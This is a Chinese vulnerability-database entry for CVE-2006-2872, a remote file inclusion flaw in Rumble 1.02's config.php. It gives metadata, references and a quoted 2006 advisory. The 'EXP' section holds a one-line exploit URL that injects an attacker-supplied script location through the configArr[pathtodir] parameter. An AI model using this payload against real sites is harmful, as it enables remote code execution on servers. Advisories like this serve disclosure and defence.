Rumble config.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194662 漏洞类型 未知
发布时间 2006-06-06 更新时间 2006-06-06
CVE编号 CVE-2006-2872 CNNVD-ID CNNVD-200606-149
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/80158
https://cxsecurity.com/issue/WLB-2006060056
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-149
|漏洞详情
Rumble1.02的config.php中的PHP远程文件包含漏洞,可让远程攻击者通过configArr[pathtodir]参数中的URL执行任意PHP代码。
|漏洞EXP
# Milli-Harekat Advisory ( www.milli-harekat.org )

# Rumble <= 1.02 version - Remote File Include Vulnerabilities

# Risk : high

# Class: Remote

# Script : Rumble 1.02 version

# Msn : erne [at] ernealizm [dot] com

# Credits : ERNE

# Thanks : Dj_ReMix,The_bekir,SpC-x,Eskobar,Blackened,Poizonbox,Di_lejyoner And ALL MHG USERS

# Vulnerable :

http://www.site.com/[rumble_path]/config.php?configArr[pathtodir]=[evil_
scripts]
|受影响的产品
Rumble Rumble 1.02
|参考资料

来源:BUGTRAQ
名称:20060604#MHGSecurityTeam---Rumble1.02versionRemoteFileInc.
链接:http://www.securityfocus.com/archive/1/archive/1/435974/100/0/threaded
来源:VIM
名称:20060605#MHGSecurityTeam---Rumble1.02versionRemoteFileInc.
链接:http://www.attrition.org/pipermail/vim/2006-June/000819.html
来源:VIM
名称:20060605#MHGSecurityTeam---Rumble1.02versionRemoteFileInc.
链接:http://www.attrition.org/pipermail/vim/2006-June/000815.html
来源:XF
名称:rumble-config-file-include(26930)
链接:http://xforce.iss.net/xforce/xfdb/26930
来源:SREASON
名称:1050
链接:http://securityreason.com/securityalert/1050